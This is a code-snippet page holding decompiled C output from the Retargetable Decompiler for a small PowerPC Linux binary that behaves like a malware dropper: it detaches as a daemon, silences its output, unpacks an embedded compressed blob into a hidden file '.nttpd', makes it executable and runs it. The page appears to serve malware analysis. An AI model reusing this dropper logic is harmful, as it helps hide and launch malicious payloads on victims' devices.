Snippets
Created by
Aniol Pagès i Selga
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 | //
// This file was generated by the Retargetable Decompiler
// Website: https://retdec.com
// Copyright (c) Retargetable Decompiler <info@retdec.com>
//
#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
// ------------------------ Structures ------------------------
struct _IO_FILE {
int32_t e0;
};
struct stat {
int32_t e0;
int32_t e1;
int32_t e2;
int32_t e3;
int32_t e4;
int32_t e5;
int32_t e6;
int32_t e7;
int32_t e8;
int32_t e9;
int32_t e10;
int32_t e11;
int32_t e12;
int32_t e13;
int32_t e14;
int32_t e15;
int32_t e16;
int32_t e17;
int32_t e18;
int32_t e19;
};
// ------------------- Function Prototypes --------------------
int32_t function_10000d00(int32_t * a1, int32_t a2, int32_t * a3, uint32_t a4, uint32_t a5, int32_t * a6, int32_t a7, int32_t a8);
int32_t function_10003f18(int32_t * a1, int32_t * a2, int32_t a3, int32_t a4, int32_t a5);
int32_t function_1000a318(int32_t a1);
int32_t function_1000a350(void);
int32_t function_1000a49c(char * command);
int32_t function_1000a6dc(int32_t a1);
int32_t function_1000a988(char * a1, int32_t * a2);
// --------------------- Global Variables ---------------------
int32_t g1 = 0x7801b57d; // 0x1001b770
int32_t g2 = 0; // 0x1001fdf8
// ------------------------ Functions -------------------------
// Address range: 0x10000d00 - 0x10003ca8
int32_t function_10000d00(int32_t * a1, int32_t a2, int32_t * a3, uint32_t a4, uint32_t a5, int32_t * a6, int32_t a7, int32_t a8) {
int32_t v1 = (int32_t)a6;
int32_t v2 = -1; // 0x10000d7c
if (__asm_rlwinm(a7, 0, 29, 29) == 0) {
// 0x10000d80
v2 = -1 - a4 + a5 + v1;
}
int32_t v3 = v2;
if (a5 < a4 || (v3 + 1 & v3) != 0) {
// 0x10000dd4
*a6 = 0;
*a3 = v1;
// 0x10000e50
return -3;
}
int32_t result = (int32_t)a1; // 0x10000e4c
if (a1 > (int32_t *)53) {
// 0x100038d8
*a3 = 0;
*a6 = 0;
result = -1;
}
// 0x10000e50
return result;
}
// Address range: 0x10003f18 - 0x100040c8
int32_t function_10003f18(int32_t * a1, int32_t * a2, int32_t a3, int32_t a4, int32_t a5) {
int32_t * mem = malloc(0x8000); // 0x10003f50
if (mem == NULL) {
// 0x100040ac
return -1;
}
int32_t v1 = (int32_t)mem; // 0x10003f50
int32_t v2 = 0; // bp-11044, 0x10003f84
int32_t v3; // bp-48, 0x10003f18
int32_t v4 = &v3;
int32_t v5 = 0; // 0x10003f84
int32_t v6 = 0;
int32_t v7 = (int32_t)a2 - v5; // bp-52, 0x10003f98
v3 = 0x8000 - v6;
int32_t v8 = v5 + (int32_t)a1; // 0x10003fb8
int32_t v9 = __asm_rlwinm(a5, 0, 31, 28); // 0x10003fcc
int32_t v10 = function_10000d00(&v2, v8, &v7, v1, v6 + v1, &v3, v9, v4); // 0x10003ff4
v5 += v7;
int32_t v11 = v3; // 0x1000400c
int32_t v12 = v8; // 0x10004014
int32_t result; // 0x10003f18
if (v11 != 0) {
// 0x10004018
v12 = v11;
result = 0;
if (v1 == -v6) {
goto lab_0x10004094;
}
}
while (v10 == 2) {
// 0x1000407c
v6 = (v11 + v6) % 0x8000;
v7 = v12 - v5;
v3 = 0x8000 - v6;
v8 = v5 + (int32_t)a1;
v9 = __asm_rlwinm(a5, 0, 31, 28);
v10 = function_10000d00(&v2, v8, &v7, v1, v6 + v1, &v3, v9, v4);
v5 += v7;
v11 = v3;
v12 = v8;
if (v11 != 0) {
// 0x10004018
v12 = v11;
result = 0;
if (v1 == -v6) {
goto lab_0x10004094;
}
}
}
// 0x10004060
result = __asm_rlwinm(__asm_mfcr(), 31, 31, 31) % 256;
lab_0x10004094:
// 0x10004094
free(mem);
*a2 = v5;
// 0x100040ac
return result;
}
// Address range: 0x1000a318 - 0x1000a350
int32_t function_1000a318(int32_t a1) {
// 0x1000a318
return fork();
}
// Address range: 0x1000a350 - 0x1000a49c
int32_t function_1000a350(void) {
// 0x1000a350
signal(SIGHUP, SIG_IGN);
signal(SIGSTOP, SIG_IGN);
uint32_t v1 = function_1000a318((int32_t)signal(SIGPIPE, SIG_IGN)); // 0x1000a398
if (v1 <= 0xffffffff) {
// 0x1000a3ac
exit(-1);
// UNREACHABLE
}
if (v1 != 0) {
// 0x1000a3c0
exit(0);
// UNREACHABLE
}
uint32_t v2 = function_1000a318(0); // 0x1000a3c8
if (v2 <= 0xffffffff) {
// 0x1000a3dc
exit(-1);
// UNREACHABLE
}
if (v2 != 0) {
// 0x1000a3f0
exit(0);
// UNREACHABLE
}
// 0x1000a3f8
umask(0);
if (setsid() <= 0xffffffff) {
// 0x1000a414
exit(-1);
// UNREACHABLE
}
uint32_t fd = open("/dev/null", O_RDWR); // 0x1000a430
if (fd <= 0xffffffff) {
// 0x1000a444
exit(-1);
// UNREACHABLE
}
// 0x1000a44c
dup2(fd, 0);
dup2(fd, 1);
int32_t result = dup2(fd, 2); // 0x1000a478
if (fd >= 3) {
// 0x1000a47c
result = close(fd);
}
// 0x1000a484
return result;
}
// Address range: 0x1000a49c - 0x1000a6dc
int32_t function_1000a49c(char * command) {
// 0x1000a49c
if (command == NULL || g2 == 0) {
// 0x1000a6bc
return -1;
}
int32_t system_rc = -1; // bp-28, 0x1000a4dc
if (g2 == 1) {
// 0x1000a66c
system_rc = system(command);
} else {
void (*prev_sig_handler)(int32_t) = signal(SIGQUIT, SIG_IGN); // 0x1000a4f8
void (*prev_sig_handler2)(int32_t) = signal(SIGINT, SIG_IGN); // 0x1000a508
void (*prev_sig_handler3)(int32_t) = signal(SIGSTOP, SIG_DFL); // 0x1000a518
int32_t pid = function_1000a318((int32_t)prev_sig_handler3); // 0x1000a520
if (pid < 0) {
// 0x1000a644
signal(SIGQUIT, prev_sig_handler);
signal(SIGINT, prev_sig_handler2);
signal(SIGSTOP, prev_sig_handler3);
} else {
if (pid == 0) {
// 0x1000a540
signal(SIGQUIT, SIG_DFL);
signal(SIGINT, SIG_DFL);
signal(SIGSTOP, SIG_DFL);
if (g2 == 3) {
// 0x1000a574
execl("/bin/bash", "bash");
} else {
// 0x1000a5a0
execl("/bin/ash", "ash");
}
// 0x1000a5cc
_exit(127);
// UNREACHABLE
}
// 0x1000a5d4
signal(SIGQUIT, SIG_IGN);
signal(SIGINT, SIG_IGN);
if (wait4(pid, (int32_t)&system_rc, 0, NULL) == -1) {
// 0x1000a614
system_rc = -1;
}
// 0x1000a61c
signal(SIGQUIT, prev_sig_handler);
signal(SIGINT, prev_sig_handler2);
signal(SIGSTOP, prev_sig_handler3);
}
}
uint32_t v1 = system_rc; // 0x1000a67c
int32_t result = -1; // 0x1000a688
if (v1 != -1 == v1 % 128 == 0) {
// 0x1000a6a4
result = __asm_rlwinm(v1, 0, 16, 23) / 256;
}
// 0x1000a6bc
return result;
}
// Address range: 0x1000a6dc - 0x1000a7c0
int32_t function_1000a6dc(int32_t a1) {
// 0x1000a6dc
g2 = 0;
int32_t v1; // bp-104, 0x1000a6dc
if (function_1000a988("/bin/bash", &v1) == 0) {
// 0x1000a71c
g2 = 3;
// 0x1000a788
return __asm_rlwinm(__asm_mfcr(), 31, 31, 31) % 256 ^ 1;
}
// 0x1000a72c
if (function_1000a988("/bin/ash", &v1) == 0) {
// 0x1000a74c
g2 = 2;
// 0x1000a788
return __asm_rlwinm(__asm_mfcr(), 31, 31, 31) % 256 ^ 1;
}
// 0x1000a75c
if (function_1000a988("/bin/sh", &v1) == 0) {
// 0x1000a77c
g2 = 1;
}
// 0x1000a788
return __asm_rlwinm(__asm_mfcr(), 31, 31, 31) % 256 ^ 1;
}
// Address range: 0x1000a7c0 - 0x1000a8cc
int main(int argc, char ** argv) {
int32_t v1 = function_1000a350(); // 0x1000a7dc
if (function_1000a6dc(v1) % 256 != 1) {
// 0x1000a8b0
return -1;
}
// 0x1000a800
unlink(".nttpd");
struct _IO_FILE * file = fopen(".nttpd", "w"); // 0x1000a81c
if (file == NULL) {
// 0x1000a8b0
return -1;
}
int32_t v2 = 0x44e6; // bp-16, 0x1000a834
function_10003f18(&g1, &v2, 0x1000a200, (int32_t)file, 1);
int32_t v3 = __asm_rlwinm(__asm_mfcr(), 31, 31, 31); // 0x1000a868
fclose(file);
int32_t result = -1; // 0x1000a884
if ((char)v3 == 0) {
// 0x1000a890
chmod(".nttpd", 448);
function_1000a49c("./.nttpd");
result = 0;
}
// 0x1000a8b0
return result;
}
// Address range: 0x1000a988 - 0x1000a99c
int32_t function_1000a988(char * a1, int32_t * a2) {
// 0x1000a988
return __xstat(3, a1, (struct stat *)a2);
}
// --------------- Dynamically Linked Functions ---------------
// int __xstat(int ver, const char * filename, struct stat * stat_buf);
// void _exit(int status);
// int chmod(const char * file, __mode_t mode);
// int close(int fd);
// int dup2(int fd, int fd2);
// int execl(const char * path, const char * arg, ...);
// void exit(int status);
// int fclose(FILE * stream);
// FILE * fopen(const char * restrict filename, const char * restrict modes);
// __pid_t fork(void);
// void free(void * ptr);
// void * malloc(size_t size);
// int open(const char * file, int oflag, ...);
// __pid_t setsid(void);
// __sighandler_t signal(int sig, __sighandler_t handler);
// int system(const char * command);
// __mode_t umask(__mode_t mask);
// int unlink(const char * name);
// __pid_t wait4(__pid_t pid, __WAIT_STATUS stat_loc, int options, struct rusage * usage);
// --------------------- Meta-Information ---------------------
// Detected compiler/packer: gcc (4.8.3)
// Detected functions: 8
|
Comments (0)
You can clone a snippet to your computer for local editing. Learn more.